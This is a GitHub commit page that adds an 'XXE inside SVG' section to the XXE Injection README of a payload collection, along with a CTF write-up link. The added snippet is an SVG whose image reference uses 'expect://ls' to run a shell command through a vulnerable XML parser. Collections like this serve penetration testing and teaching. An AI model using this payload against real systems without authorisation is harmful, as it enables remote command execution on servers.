Skip to content

Commit

Permalink
Merge pull request swisskyrepo#57 from ajdumanhug/master
Browse files Browse the repository at this point in the history
Add XXE inside SVG
  • Loading branch information
swisskyrepo authored Mar 23, 2019
2 parents 3b70783 + fed4bda commit 9d3ecce
Showing 1 changed file with 8 additions and 0 deletions.
8 changes: 8 additions & 0 deletions XXE Injection/README.md
Original file line number Diff line number Diff line change
Expand Up @@ -215,6 +215,13 @@ Ref. [brianwrf/CVE-2018-11788](https://github.com/brianwrf/CVE-2018-11788)

## XXE in exotic files

### XXE inside SVG
```
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="300" version="1.1" height="200">
<image xlink:href="expect://ls"></image>
</svg>
```

### XXE inside SOAP

```xml
Expand Down Expand Up @@ -265,3 +272,4 @@ GIF (experimental)
* [XXE through SAML](https://seanmelia.files.wordpress.com/2016/01/out-of-band-xml-external-entity-injection-via-saml-redacted.pdf)
* [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html)
* [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/)
* [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/)

0 comments on commit 9d3ecce

Please sign in to comment.